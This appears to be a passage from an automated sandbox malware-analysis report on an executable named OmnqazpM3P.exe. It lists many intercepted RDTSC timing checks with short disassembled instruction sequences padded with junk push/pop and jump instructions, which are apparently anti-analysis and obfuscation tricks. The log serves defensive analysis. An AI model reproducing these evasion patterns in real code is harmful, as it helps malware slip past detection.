Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2F811 second address: A2F81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2F996 second address: A2F99C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FC19 second address: A2FC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FC1F second address: A2FC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FC25 second address: A2FC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A35E73 second address: A35E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36302 second address: A3631B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jg 00007F8D1541FE0Ah 0x0000000c pushad 0x0000000d jng 00007F8D1541FE06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3631B second address: A36336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8D1542224Bh 0x0000000b popad 0x0000000c pushad 0x0000000d jg 00007F8D15422246h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A364A5 second address: A364A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A364A9 second address: A364D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push edi 0x00000008 jmp 00007F8D15422259h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A364D0 second address: A364D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A364D4 second address: A364D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36637 second address: A36644 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8D1541FE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36644 second address: A36659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D15422250h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36659 second address: A36666 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8D1541FE08h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36666 second address: A3666C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3666C second address: A3667E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007F8D1541FE06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3667E second address: A3669E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D15422259h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36805 second address: A36835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1541FE0Dh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F8D1541FE17h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36B2F second address: A36B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36CB2 second address: A36CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36CB6 second address: A36CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36CBA second address: A36CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36CC0 second address: A36CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36CC6 second address: A36CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36CCC second address: A36CD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A36CD0 second address: A36CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8D1541FE06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3C86A second address: A3C874 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8D15422246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3C874 second address: A3C87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3C87A second address: A3C880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3C880 second address: A3C884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A3C884 second address: A3C88F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A40366 second address: A4036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A404AA second address: A404B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A4EA05 second address: A4EA0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A4EA0A second address: A4EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8D15422246h 0x0000000a je 00007F8D15422246h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A5191B second address: A51921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A56CF6 second address: A56D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8D15422246h 0x0000000a jmp 00007F8D15422251h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A56D18 second address: A56D29 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F8D1541FE06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A56D29 second address: A56D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A5CB62 second address: A5CB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A5CB68 second address: A5CB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A5CB6E second address: A5CB72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A5F3B0 second address: A5F3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F8D15422246h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A5F258 second address: A5F268 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F8D1541FE12h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A69731 second address: A69735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A69735 second address: A69739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A69739 second address: A6973F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6973F second address: A6974E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A69CB7 second address: A69CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6A9C3 second address: A6A9C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6A9C7 second address: A6A9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6F621 second address: A6F625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6F625 second address: A6F62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6F62B second address: A6F645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6F645 second address: A6F64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6F64A second address: A6F650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A6F650 second address: A6F670 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8D15422252h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F8D15422246h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A7128B second address: A71290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A767A3 second address: A767A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A767A7 second address: A767AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A767AD second address: A767B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A767B7 second address: A767BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A767BC second address: A767C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A767C4 second address: A767CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A80A21 second address: A80A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A80A27 second address: A80A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A820A8 second address: A820AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A820AF second address: A820B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A890AC second address: A890E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F8D15422246h 0x0000000c js 00007F8D15422246h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F8D15422254h 0x00000019 jmp 00007F8D15422251h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A890E7 second address: A8910A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1541FE18h 0x00000009 popad 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A8D1D3 second address: A8D1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8D15422246h 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F8D15422246h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A8D045 second address: A8D049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A8D049 second address: A8D06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8D15422246h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8D15422259h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A8D06E second address: A8D074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A87B24 second address: A87B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A87B2A second address: A87B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8D1541FE0Dh 0x0000000d jbe 00007F8D1541FE08h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A87B47 second address: A87B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A87B4D second address: A87B59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A87B59 second address: A87B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A9B0AF second address: A9B0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A9B0B4 second address: A9B0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A9B0BC second address: A9B0D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A9CE7E second address: A9CE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A9CE83 second address: A9CEC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D1541FE19h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F8D1541FE0Ch 0x00000011 jno 00007F8D1541FE06h 0x00000017 js 00007F8D1541FE06h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: AB5D08 second address: AB5D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8D15422246h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: AB6282 second address: AB6287 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: AB653C second address: AB654E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1542224Ch 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: AB6853 second address: AB685E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: AB6AC3 second address: AB6AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F8D15422252h 0x0000000d jo 00007F8D1542224Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: AB9A31 second address: AB9A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 mov eax, dword ptr [eax] 0x00000012 jns 00007F8D1541FE18h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jnp 00007F8D1541FE1Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: ABB0D0 second address: ABB0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F8D15422258h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: ABB0F3 second address: ABB109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8D1541FE06h 0x0000000a pop ecx 0x0000000b jmp 00007F8D1541FE0Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: ABB109 second address: ABB10E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: ABEA39 second address: ABEA3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: ABEA3F second address: ABEA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F8D15422252h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: ABEA5B second address: ABEA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: ABEA66 second address: ABEA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
